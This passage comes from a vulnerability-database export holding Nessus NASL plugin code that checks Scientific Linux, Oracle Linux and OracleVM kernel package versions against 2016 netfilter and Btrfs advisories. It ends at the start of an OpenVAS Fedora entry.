CONFIG_USER_NS\n and CONFIG_NET_NS and the user is granted elevated\n privileges. (CVE-2016-4997, Important)\n\n - An out-of-bounds heap memory access leading to a Denial\n of Service, heap disclosure, or further impact was found\n in setsockopt(). The function call is normally\n restricted to root, however some processes with\n cap_sys_admin may also be able to trigger this flaw in\n privileged container environments. (CVE-2016-4998,\n Moderate)\n\nBug Fix(es) :\n\n - In some cases, running the ipmitool command caused a\n kernel panic due to a race condition in the ipmi message\n handler. This update fixes the race condition, and the\n kernel panic no longer occurs in the described scenario.\n\n - Previously, running I/O-intensive operations in some\n cases caused the system to terminate unexpectedly after\n a NULL pointer dereference in the kernel. With this\n update, a set of patches has been applied to the 3w-9xxx\n and 3w-sas drivers that fix this bug. As a result, the\n system no longer crashes in the described scenario.\n\n - Previously, the Stream Control Transmission Protocol\n (SCTP) sockets did not inherit the SELinux labels\n properly. As a consequence, the sockets were labeled\n with the unlabeled_t SELinux type which caused SCTP\n connections to fail. The underlying source code has been\n modified, and SCTP connections now works as expected.\n\n - Previously, the bnx2x driver waited for transmission\n completions when recovering from a parity event, which\n substantially increased the recovery time. With this\n update, bnx2x does not wait for transmission completion\n in the described circumstances. As a result, the\n recovery of bnx2x after a parity event now takes less\n time.\n\nEnhancement(s) :\n\n - With this update, the audit subsystem enables filtering\n of processes by name besides filtering by PID. Users can\n now audit by executable name (with the '-F\n exe=<path-to-executable>' option), which allows\n expression of many new audit rules. This functionality\n can be used to create events when specific applications\n perform a syscall.\n\n - With this update, the Nonvolatile Memory Express (NVMe)\n and the multi- queue block layer (blk_mq) have been\n upgraded to the Linux 4.5 upstream version. Previously,\n a race condition between timeout and freeing request in\n blk_mq occurred, which could affect the\n blk_mq_tag_to_rq() function and consequently a kernel\n oops could occur. The provided patch fixes this race\n condition by updating the tags with the active request.\n The patch simplifies blk_mq_tag_to_rq() and ensures that\n the two requests are not active at the same time.\n\n - The Hyper-V storage driver (storvsc) has been upgraded\n from upstream. This update provides moderate performance\n improvement of I/O operations when using storvscr for\n certain workloads.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1609&L=scientific-linux-errata&F=&S=&P=1852\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f8ec1283\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/04/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-abi-whitelists-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-doc-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.36.1.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.36.1.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:51:02", "description": "Description of changes:\n\n[2.6.39-400.284.2.el6uek]\n- Btrfs: fix truncation of compressed and inlined extents (Divya Indi) \n[Orabug: 22307286] {CVE-2015-8374}\n- Btrfs: fix file corruption and data loss after cloning inline extents \n(Divya Indi) [Orabug: 22307286] {CVE-2015-8374}\n- netfilter: x_tables: make sure e->next_offset covers remaining blob \nsize (Florian Westphal) [Orabug: 24682073] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian \nWestphal) [Orabug: 24682071] {CVE-2016-4997} {CVE-2016-4998}\n\n[2.6.39-400.284.1.el6uek]\n- rds: schedule local connection activity in proper workqueue (Ajaykumar \nHotchandani) [Orabug: 22819661]\n- ib_core: make wait_event uninterruptible in ib_flush_fmr_pool() \n(Avinash Repaka) [Orabug: 24525022]\n- net/mlx4: Support shutdown() interface (Ajaykumar Hotchandani) \n[Orabug: 24616261]", "edition": 26, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-23T00:00:00", "title": "Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2016-3618)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8374", "CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-09-23T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:kernel-uek-firmware", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek", "cpe:/o:oracle:linux:5", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-debug"], "id": "ORACLELINUX_ELSA-2016-3618.NASL", "href": "https://www.tenable.com/plugins/nessus/93677", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2016-3618.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93677);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2015-8374\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"Oracle Linux 5 / 6 : Unbreakable Enterprise kernel (ELSA-2016-3618)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Description of changes:\n\n[2.6.39-400.284.2.el6uek]\n- Btrfs: fix truncation of compressed and inlined extents (Divya Indi) \n[Orabug: 22307286] {CVE-2015-8374}\n- Btrfs: fix file corruption and data loss after cloning inline extents \n(Divya Indi) [Orabug: 22307286] {CVE-2015-8374}\n- netfilter: x_tables: make sure e->next_offset covers remaining blob \nsize (Florian Westphal) [Orabug: 24682073] {CVE-2016-4997} {CVE-2016-4998}\n- netfilter: x_tables: validate e->target_offset early (Florian \nWestphal) [Orabug: 24682071] {CVE-2016-4997} {CVE-2016-4998}\n\n[2.6.39-400.284.1.el6uek]\n- rds: schedule local connection activity in proper workqueue (Ajaykumar \nHotchandani) [Orabug: 22819661]\n- ib_core: make wait_event uninterruptible in ib_flush_fmr_pool() \n(Avinash Repaka) [Orabug: 24525022]\n- net/mlx4: Support shutdown() interface (Ajaykumar Hotchandani) \n[Orabug: 24616261]\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-September/006357.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2016-September/006358.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected unbreakable enterprise kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-8374\", \"CVE-2016-4997\", \"CVE-2016-4998\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2016-3618\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-2.6.39-400.284.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-2.6.39-400.284.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-debug-devel-2.6.39-400.284.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-devel-2.6.39-400.284.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-doc-2.6.39-400.284.2.el5uek\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL5\", reference:\"kernel-uek-firmware-2.6.39-400.284.2.el5uek\")) flag++;\n\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.284.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.284.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.284.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.284.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.284.2.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.284.2.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T13:23:59", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Btrfs: fix truncation of compressed and inlined extents\n (Ashish Samant) [Orabug: 22307285] (CVE-2015-8374)\n\n - Btrfs: fix file corruption and data loss after cloning\n inline extents (Divya Indi) [Orabug: 22307285]\n (CVE-2015-8374)\n\n - netfilter: x_tables: make sure e->next_offset covers\n remaining blob size (Florian Westphal) [Orabug:\n 24682074] (CVE-2016-4997) (CVE-2016-4998)\n\n - netfilter: x_tables: validate e->target_offset early\n (Florian Westphal) [Orabug: 24682074] (CVE-2016-4997)\n (CVE-2016-4998)\n\n - rds: schedule local connection activity in proper\n workqueue (Ajaykumar Hotchandani) [Orabug: 24624195]\n\n - ib_core: make wait_event uninterruptible in\n ib_flush_fmr_pool (Avinash Repaka) [Orabug: 24655952]\n\n - net/mlx4: Support shutdown interface (Gavin Shan)\n [Orabug: 24624181]", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-23T00:00:00", "title": "OracleVM 3.3 : Unbreakable / etc (OVMSA-2016-0133)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-8374", "CVE-2016-4997", "CVE-2016-4998"], "modified": "2016-09-23T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.3", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2016-0133.NASL", "href": "https://www.tenable.com/plugins/nessus/93680", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2016-0133.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(93680);\n script_version(\"2.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-8374\", \"CVE-2016-4997\", \"CVE-2016-4998\");\n\n script_name(english:\"OracleVM 3.3 : Unbreakable / etc (OVMSA-2016-0133)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Btrfs: fix truncation of compressed and inlined extents\n (Ashish Samant) [Orabug: 22307285] (CVE-2015-8374)\n\n - Btrfs: fix file corruption and data loss after cloning\n inline extents (Divya Indi) [Orabug: 22307285]\n (CVE-2015-8374)\n\n - netfilter: x_tables: make sure e->next_offset covers\n remaining blob size (Florian Westphal) [Orabug:\n 24682074] (CVE-2016-4997) (CVE-2016-4998)\n\n - netfilter: x_tables: validate e->target_offset early\n (Florian Westphal) [Orabug: 24682074] (CVE-2016-4997)\n (CVE-2016-4998)\n\n - rds: schedule local connection activity in proper\n workqueue (Ajaykumar Hotchandani) [Orabug: 24624195]\n\n - ib_core: make wait_event uninterruptible in\n ib_flush_fmr_pool (Avinash Repaka) [Orabug: 24655952]\n\n - net/mlx4: Support shutdown interface (Gavin Shan)\n [Orabug: 24624181]\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2016-September/000549.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3ea6d000\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel 4.6.3 Netfilter Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.3\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/22\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/23\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.3\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.3\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-3.8.13-118.11.2.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.3\", reference:\"kernel-uek-firmware-3.8.13-118.11.2.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:57", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1583", "CVE-2016-4997", "CVE-2016-4470", "CVE-2016-4998"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2016-08-02T00:00:00", "id": "OPENVAS:1361412562310808914", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808914", "type": "openvas", "title": "Fedora Update for kernel FEDORA-2016-63ee0999e4", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for kernel FEDORA-2016-63ee0999e4\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public 